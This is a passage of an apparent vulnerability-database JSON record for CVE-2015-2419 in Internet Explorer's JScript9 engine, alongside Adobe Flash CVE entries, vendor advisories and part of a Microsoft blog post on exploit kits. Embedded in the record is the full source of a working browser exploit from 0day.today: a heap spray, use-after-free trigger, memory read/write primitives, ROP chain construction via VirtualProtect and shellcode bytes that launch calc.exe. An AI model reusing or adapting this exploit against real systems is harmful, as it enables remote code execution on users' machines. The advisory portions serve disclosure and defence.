attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Internet Explorer.", "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Jscript9 Memory Corruption (MS15-065: CVE-2015-2419)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2021-09-01T00:00:00", "id": "CPAI-2015-0843", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T07:39:40", "description": "A remote code execution vulnerability exists in the way that the JScript engine, when rendered in Internet Explorer, handles objects in memory. A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Internet Explorer.", "cvss3": {}, "published": "2020-09-21T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Memory Corruption (CVE-2015-2419)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2020-09-21T00:00:00", "id": "CPAI-2015-1058", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:47:32", "description": "Adobe Flash Player 21.0.0.197 and earlier allows remote attackers to cause\na denial of service (application crash) or possibly execute arbitrary code\nvia unspecified vectors, as exploited in the wild in April 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-04-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-1019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-07T00:00:00", "id": "UB:CVE-2016-1019", "href": "https://ubuntu.com/security/CVE-2016-1019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:08:48", "description": "Adobe Flash Player 21.0.0.197 and earlier allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors, as exploited in the wild in April 2016.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-04-07T10:59:00", "type": "cve", "title": "CVE-2016-1019", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019"], "modified": "2018-10-12T22:11:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:20.0.0.306", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:21.0.0.97", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:18.0.0.333", "cpe:/a:adobe:flash_player:11.2.202.577", "cpe:/a:adobe:flash_player:19.0.0.185", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:20.0.0.235"], "id": "CVE-2016-1019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1019", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:edge:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:internet_explorer:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:chrome:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.333:*:*:*:esr:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.577:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.306:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:13:15", "description": "JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"JScript9 Memory Corruption Vulnerability.\"", "cvss3": {}, "published": "2015-07-14T21:59:00", "type": "cve", "title": "CVE-2015-2419", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2018-10-12T22:09:00", "cpe": ["cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11"], "id": "CVE-2015-2419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2419", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:11:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:07:58", "description": "Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code by overriding NetConnection object properties to leverage an unspecified \"type confusion,\" a different vulnerability than CVE-2016-1019.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-04-09T01:59:00", "type": "cve", "title": "CVE-2016-1015", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1015", "CVE-2016-1019"], "modified": "2018-10-12T22:11:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:20.0.0.306", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:21.0.0.97", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:18.0.0.333", "cpe:/a:adobe:flash_player:11.2.202.577", "cpe:/a:adobe:flash_player:19.0.0.185", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:20.0.0.235"], "id": "CVE-2016-1015", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1015", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:edge:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:internet_explorer:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:chrome:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.333:*:*:*:esr:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.577:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:21.0.0.97:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.306:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2021-06-08T18:48:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks may cause denial-of-service conditions.\n\n### Technologies Affected\n\n * Avaya CallPilot 4.0 \n * Avaya CallPilot 4.0.1 \n * Avaya CallPilot 5.0 \n * Avaya CallPilot 5.0.1 \n * Avaya CallPilot 5.1.0 \n * Avaya Meeting Exchange - Client Registration Server \n * Avaya Meeting Exchange - Recording Server \n * Avaya Meeting Exchange - Streaming Server \n * Avaya Meeting Exchange - Web Conferencing Server \n * Avaya Meeting Exchange - Webportal \n * Avaya Messaging Application Server 5.0 \n * Avaya Messaging Application Server 5.0.1 \n * Avaya Messaging Application Server 5.2 \n * Avaya Messaging Application Server 5.2.1 \n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Set web browser security to disable the execution of script code or active content.** \nSince a successful exploit of this issue requires malicious code to execute in web clients, consider disabling support for script code and active content within the client browser. Note that this mitigation tactic might adversely affect legitimate websites that rely on the execution of browser-based script code.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2015-07-14T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2015-2419 JScript9 Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-2419"], "modified": "2015-07-14T00:00:00", "id": "SMNTC-75661", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/75661", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-05-24T18:03:27", "description": "Exploit for windows platform in category local exploits", "cvss3": {}, "published": "2018-05-24T00:00:00", "type": "zdt", "title": "Microsoft Internet Explorer 11 #InternetExplorer #IE - javascript Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-2419"], "modified": "2018-05-24T00:00:00", "id": "1337DAY-ID-30433", "href": "https://0day.today/exploit/description/30433", "sourceData": "<html>\r\n<body>\r\n<script>\r\nARR_SIZE = 3248;\r\nfirst_gadget_offsets = [150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476];\r\nstackpivot_gadget_offsets = [122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542];\r\nfirst_gadget = [0x89, 0x41, 0x0c, 0xc3];\r\nstackpivot_gadget = [0x94, 0xc3];\r\ngadget_offsets = {\"stackpivot\": 0, \"g1\": 0, \"g2\": 0};\r\n \r\nfunction empty_replacer(a,b) {\r\n return b;\r\n}\r\n \r\nfunction create_list(lst, depth) {\r\n if (depth > 5)\r\n {\r\n return;\r\n }\r\n else\r\n {\r\n // Creates 19 objects in each nested list\r\n for (i = 0; i <= 19; i++)\r\n {\r\n // Create random string with length 8\r\n for (var val = \"\", c = 0; c <= 8; c++) {\r\n rnd = Math.floor((Math.random() * 90) + 48);\r\n l = String.fromCharCode(rnd);\r\n val = val + l;\r\n }\r\n lst[\"a\" + i] = val;\r\n }\r\n create_list(lst[\"a0\"] = {}, depth + 1);\r\n }\r\n}\r\n \r\nfunction create_triggering_json() {\r\n var lst = {}\r\n create_list(lst, 0);\r\n return lst;\r\n}\r\n \r\n// Create vulnerable JSON\r\ntrig_json = create_triggering_json();\r\n \r\nspray = new Array(4096);\r\nbuff = new ArrayBuffer(4);\r\nsize = 0;\r\n \r\n// Heap Spray\r\nvar I = setInterval(function(){ \r\n for (i=0;i<400;i++,size++) {\r\n spray[size] = new Array(15352);\r\n for (j = 0; j< 85;j++) {\r\n spray[size][j] = new Uint32Array(buff);\r\n }\r\n 0 == i && (yb = spray[0][0][\"length\"], yb[\"toString\"](16))\r\n }\r\n \r\n size >= (4096) && (clearInterval(I), uaf()) \r\n}, 100);\r\n \r\nvar arr = []\r\nfunction uaf()\r\n{\r\n JSON.stringify(trig_json,empty_replacer);\r\n \r\n var pattern = [311357464,311357472,311357464]; \r\n for (var b = 3248 * 2, c = 203; c < b; c++)\r\n arr[c] = new ArrayBuffer(12);\r\n \r\n for (c = 203; c < b; c++)\r\n {\r\n var data = new Uint32Array(arr[c],0);\r\n a = 0;\r\n for (var i = data[\"length\"] / pattern[\"length\"]; a < i; a++)\r\n for (var d=0, e = pattern[\"length\"]; d < e;d++) \r\n data[a+d] = pattern[d];\r\n \r\n }\r\n \r\n CollectGarbage();\r\n \r\n search_corrupted_array();\r\n}\r\n \r\nvar damaged_array;\r\nfunction search_corrupted_array()\r\n{\r\n for (i=0;i<4096;i++) \r\n {\r\n for (j = 0; j< 85;j++) {\r\n if (spray[i][j].length != 1)\r\n {\r\n damaged_array = spray[i][j];\r\n damaged_array[1] = 0x7fffffff; // Set array to include almost entire user-space\r\n damaged_array[2] = 0x10000;\r\n \r\n write_dword_to_addr(damaged_array, 0x128e0020, 0xDEC0DE * 2 | 1); // Mark the first element of one of the arrays, to find it later\r\n for (k = 0; k < 4096; k++) { // find the marked array\r\n if (spray[k][0] == 0xDEC0DE) {\r\n break;\r\n }\r\n }\r\n // now spray[k][0] is 0x128e0020\r\n if (k == 4096) break;\r\n spray[k][2] = new Array(1); // creates a native integer array, pointed by 0x128e0028\r\n spray[k][2][0] = new ArrayBuffer(0xc); // turns the array to be JavascriptArray\r\n arr_obj = read_dword_from_addr(damaged_array, 0x128e0028); // address of the new JavascriptArray object\r\n jscript9_base_addr = read_dword_from_addr(damaged_array, arr_obj) & 0xffff0000; // read the first dword of the JavascriptArray object, which is the vftable pointer, null the lower word to get jscript9 base address\r\n vp_addr = get_vp_addr(damaged_array, jscript9_base_addr); // virtual address of kernel32!VirtualProtectStub\r\n if (vp_addr == 0) break;\r\n arrbuf = new ArrayBuffer(0x5000); // this buffer will contain the ROP chain\r\n spray[k][0] = new Uint32Array(arrbuf); // Uint32Array that is a view to the arraybuffer above, pointed by 0x128e0020\r\n rc_buf_ui32_obj = read_dword_from_addr(damaged_array, 0x128e0020); // address of the Uint32Array object\r\n rc_buf_ui32_data = read_dword_from_addr(damaged_array, rc_buf_ui32_obj + 0x20); // address of first element of Uint32Array above\r\n var shellcode_caller = [0x53, 0x55, 0x56, 0xe8, 0x09, 0x00, 0x00, 0x00, 0x5e, 0x5d, 0x5b, 0x8b, 0x63, 0x0c, 0xc2, 0x0c, 0x00, 0x90];\r\n var shellcode = [96, 49, 210, 82, 104, 99, 97, 108, 99, 84, 89, 82, 81, 100, 139, 114, 48, 139, 118, 12, 139, 118, 12, 173, 139, 48, 139, 126, 24, 139, 95, 60, 139, 92, 31, 120, 139, 116, 31, 32, 1, 254, 139, 84, 31, 36, 15, 183, 44, 23, 66, 66, 173, 129, 60, 7, 87, 105, 110, 69, 117, 240, 139, 116, 31, 28, 1, 254, 3, 60, 174, 255, 215, 88, 88, 97, 195]; // open calc.exe shellcode\r\n spray[k][1] = new Uint8Array(shellcode_caller.concat(shellcode)); // shellcode, pointed by 0x128e0024\r\n sc_obj = read_dword_from_addr(damaged_array, 0x128e0024); // address of the Uint8Array object containing the shellcode\r\n sc_data = read_dword_from_addr(damaged_array, sc_obj + 0x20); // address of the shellcode buffer itself\r\n construct_gadget_dict(damaged_array, jscript9_base_addr);\r\n \r\n // construct the ROP chain\r\n spray[k][0][0] = jscript9_base_addr + gadget_offsets[\"g1\"]; // mov dword ptr [ecx+0c], eax # ret\r\n spray[k][0][1] = jscript9_base_addr + gadget_offsets[\"g2\"]; // ret\r\n spray[k][0][2] = vp_addr; // VirtualProtectStub pointer\r\n spray[k][0][3] = sc_data; // shellcode address (return address to which we return after VirtualProtect)\r\n spray[k][0][4] = sc_data; // lpAddress\r\n spray[k][0][5] = spray[k][1].length; // dwSize\r\n spray[k][0][6] = 0x40; // flNewProtect = PAGE_EXECUTE_READWRITE\r\n spray[k][0][7] = rc_buf_ui32_data + 0x20; // lpflOldProtect\r\n spray[k][0][0x90 / 4] = jscript9_base_addr + gadget_offsets[\"stackpivot\"]; // stackpivot gadget in offset 0x90 from ROP chain top\r\n write_dword_to_addr(damaged_array, arr_obj, rc_buf_ui32_data); // overwrite the JavascriptArray object's vftable pointer with the address of the ROP chain\r\n spray[k][2][0] = 0; // set the first item of the overwritten JavascriptArray object, triggering the call to JavascriptArray::SetItem. since the vftable is now the ROP chain, and SetItem is in offset 0x90 in the original vftable, this will trigger the stackpivot gadget\r\n }\r\n }\r\n }\r\n}\r\n \r\nfunction get_index_from_addr(addr) {\r\n return Math.floor((addr - 0x10000) / 4);\r\n}\r\n \r\nfunction get_iat_offset(arr, js9_base) {\r\n return 0x3e6000;\r\n}\r\n \r\nfunction get_pe_header_offset(arr, js9_base) {\r\n var offset = read_dword_from_addr(arr, js9_base + 0x3c);\r\n return offset;\r\n}\r\n \r\nfunction get_import_table_offset(arr, js9_base) {\r\n var pe_header_offset = get_pe_header_offset(arr, js9_base);\r\n var pe_header = js9_base + pe_header_offset;\r\n var import_table_offset = read_dword_from_addr(arr, pe_header + 0x80);\r\n return import_table_offset;\r\n}\r\n \r\nfunction get_import_table_size(arr, js9_base) {\r\n var pe_header_offset = get_pe_header_offset(arr, js9_base);\r\n var pe_header = js9_base + pe_header_offset;\r\n var import_table_size = read_dword_from_addr(arr, pe_header + 0x84);\r\n return import_table_size;\r\n}\r\n \r\nfunction get_vp_addr(arr, js9_base) {\r\n var kernel32_entry = get_kernel32_entry(arr, js9_base);\r\n var string_pointers_offset = read_dword_from_addr(arr, kernel32_entry - 0xc);\r\n var function_pointers_offset = read_dword_from_addr(arr, kernel32_entry + 0x4);\r\n var func_name = new String();\r\n for (fptr = js9_base + function_pointers_offset, sptr = js9_base + string_pointers_offset; fptr != 0 && sptr != 0; fptr += 4, sptr += 4) {\r\n func_name = read_string_from_addr(arr, js9_base + read_dword_from_addr(arr, sptr) +2);\r\n if (func_name.indexOf(\"VirtualProtect\") > -1) {\r\n return read_dword_from_addr(arr, fptr);\r\n }\r\n }\r\n return 0;\r\n}\r\n \r\nfunction get_kernel32_entry(arr, js9_base) {\r\n var it_addr = js9_base + get_import_table_offset(arr, js9_base);\r\n var it_size = get_import_table_size(arr, js9_base);\r\n var s = new String();\r\n for (var next_addr = it_addr + 0xc; next_addr < js9_base + it_addr + it_size; next_addr += 0x14) {\r\n var it_entry = read_dword_from_addr(arr, next_addr);\r\n if (it_entry != 0) {\r\n s = read_string_from_addr(arr, js9_base + it_entry);\r\n if (s.indexOf(\"KERNEL32\") > -1 || s.indexOf(\"kernel32\") > -1) {\r\n return next_addr;\r\n }\r\n }\r\n }\r\n return 0;\r\n}\r\n \r\nfunction read_dword_from_addr(arr, addr) {\r\n return arr[get_index_from_addr(addr)];\r\n}\r\n \r\nfunction read_byte_from_addr(arr, addr) {\r\n var mod = addr % 4;\r\n var ui32 = read_dword_from_addr(arr, addr);\r\n return ((ui32 >> (mod * 8)) & 0x000000ff);\r\n \r\n}\r\n \r\nfunction read_string_from_addr(arr, addr) {\r\n var s = new String();\r\n var i = 0;\r\n for (i = addr, c = \"stub\"; c != String.fromCharCode(0); i++) {\r\n c = String.fromCharCode(read_byte_from_addr(arr, i));\r\n s += c;\r\n }\r\n return s;\r\n}\r\n \r\nfunction write_dword_to_addr(arr, addr, data) {\r\n arr[get_index_from_addr(addr)] = data;\r\n}\r\n \r\nfunction find_gadget_offset(arr, js9_base, offsets, gadget, gadget_key) {\r\n var first_dword = 0x0, second_dword = 0x0, g = 0;\r\n var gadget_candidate = [];\r\n for (g = 0; g < offsets.length; g++) {\r\n first_dword = read_dword_from_addr(arr, js9_base + offsets[g]);\r\n second_dword = read_dword_from_addr(arr, js9_base + offsets[g] + 4);\r\n \r\n gadget_candidate = convert_reverse_ui32_to_array(first_dword);\r\n gadget_candidate = gadget_candidate.concat(convert_reverse_ui32_to_array(second_dword));\r\n \r\n if (contains_gadget(gadget_candidate, gadget)) {\r\n gadget_offsets[gadget_key] = offsets[g];\r\n break;\r\n }\r\n }\r\n}\r\n \r\nfunction construct_gadget_dict(arr, js9_base) {\r\n find_gadget_offset(arr, js9_base, first_gadget_offsets, first_gadget, \"g1\");\r\n find_gadget_offset(arr, js9_base, stackpivot_gadget_offsets, stackpivot_gadget, \"stackpivot\");\r\n if (gadget_offsets[\"stackpivot\"] > 0) {\r\n gadget_offsets[\"g2\"] = gadget_offsets[\"stackpivot\"] + 1;\r\n }\r\n}\r\n \r\nfunction contains_gadget(arr, sub) {\r\n var i = 0;\r\n for (i = 0; i < sub.length; i++) {\r\n if (arr.indexOf(sub[i]) == -1) return false;\r\n }\r\n return true;\r\n}\r\n \r\nfunction convert_reverse_ui32_to_array(ui32) {\r\n var arr = [];\r\n var i = 0;\r\n var tmp = ui32;\r\n for (i = 0; i < 4; i++, tmp = tmp >> 8) {\r\n arr.push(tmp & 0x000000ff);\r\n }\r\n return arr;\r\n}\r\n</script>\r\n</body>\r\n</html>\n\n# 0day.today [2018-05-24] #", "sourceHref": "https://0day.today/exploit/30433", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mmpc": [{"lastseen": "2017-06-30T15:02:20", "description": "Despite the disruption of Axpergle (Angler), which dominated the landscape in early 2016, exploit kits as a whole continued to be a threat to PCs running unpatched software. Some of the most prominent threats, from malvertising to ransomware, used exploit kits to infect millions of computers worldwide in 2016.\n\nThe prevalence of exploit kits as an infection vector can be attributed to these factors: 1) they continue to use old but effective exploits while efficiently integrating new ones, 2) they are easily obtained from underground cybercriminal markets; and 3) there remains a significant number of machines that are potentially vulnerable because they run unpatched software.\n\nUsing up-to-date browser and software remains to be the most effective mitigation against exploit kits. Upgrading to the latest versions and enabling automatic updates means patches are applied as soon as they are released.\n\n(Note: This blog post is the first in the 2016 threat landscape review series. In this blog series, we look back at how major areas in the threat landscape, including ransomware, macro malware, support scam malware, and unwanted software, have transformed over the past year. We will discuss trends that have emerged, as well as security solutions that tackle threats as they evolve.)\n\n## Meadgive gained ground as Axpergle is disrupted\n\nIn the first five months of 2016, [Axpergle](<https://blogs.technet.microsoft.com/mmpc/tag/axpergle/>) (also known as Angler exploit kit) infected around 100,000 machines monthly. However, sometime in June, the exploit kit vanished. Reports associated this development with the [arrest of 50 hackers in Russia](<http://www.securityweek.com/did-angler-exploit-kit-die-russian-lurk-arrests>).\n\nAxpergle is primarily associated with the delivery of the 32- and 64-bit versions of [Bedep](<https://blogs.technet.microsoft.com/mmpc/2016/04/12/msrt-april-release-features-bedep-detection/>), a backdoor that also downloads more complex and more dangerous malware, such as the information stealers [Ursnif](<https://blogs.technet.microsoft.com/mmpc/tag/ursnif/>) and [Fareit](<https://blogs.technet.microsoft.com/mmpc/tag/win32fareit/>).\n\n\n\n_Figure 1. Monthly encounters by exploit kit family_\n\nThe disappearance of Axpergle made way for other exploit kits as cybercriminals presumably looked for alternatives. The Neutrino exploit kit started dominating for around three months, but scaled down in September. Reports say that Neutrino operators went into \u201cprivate\u201d mode, choosing to cater to select cybercriminal groups.\n\nA look at the year-long trend shows that [Meadgive](<https://blogs.technet.microsoft.com/mmpc/tag/meadgive/>) (also known as RIG exploit kit) filled the hole left by Axpergle and Neutrino (and Nuclear before them). By the end of 2016, while overall volume has gone down, most exploit kit activity can be attributed to Meadgive.\n\nMeadgive has been around since March 2014. Attackers who use Meadgive typically inject a malicious script island into compromised websites. When the compromised site is accessed, the malicious script, which is usually obfuscated, loads the exploit. Recently, Meadgive has primarily used an exploit for the Adobe Flash vulnerability CVE-2015-8651 that executes a JavaScript file, which then downloads an encrypted PE file.\n\nEven with the decreased activity, exploit kits continue to be a global threat, having been observed in more than 200 countries in 2016. They affect the following territories the most:\n\n 1. United States\n 2. Canada\n 3. Japan\n 4. United Kingdom\n 5. France\n 6. Italy\n 7. Germany\n 8. Taiwan\n 9. Spain\n 10. Republic of Korea\n\n\n\n_Figure 2. Geographic distribution of exploit kit encounters_\n\n## Exploit kits in the ransomware trail\n\nAs exploit kits have become reliable means to deliver malware, it is not surprising that ransomware, currently the most prevalent malware, continue to use them as launch pads for infection.\n\nMeadgive, for instance, is known for delivering one of the most active ransomware in 2016. As late as December 2016, we documented new [Cerber](<https://blogs.technet.microsoft.com/mmpc/tag/cerber/>) ransomware versions being delivered through a [Meadgive exploit kit campaign](<https://blogs.technet.microsoft.com/mmpc/2016/12/21/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close/>), on top of a concurrent spam campaign.\n\nNeutrino, which temporarily dominated in 2016, is associated with another prominent ransomware family. Like Cerber, [Locky](<https://blogs.technet.microsoft.com/mmpc/tag/locky/>) also uses both exploit kits and spam email as vectors. With the decreased activity from Neutrino, we\u2019re seeing Locky being distributed more and more through spam campaigns.\n\n**Top 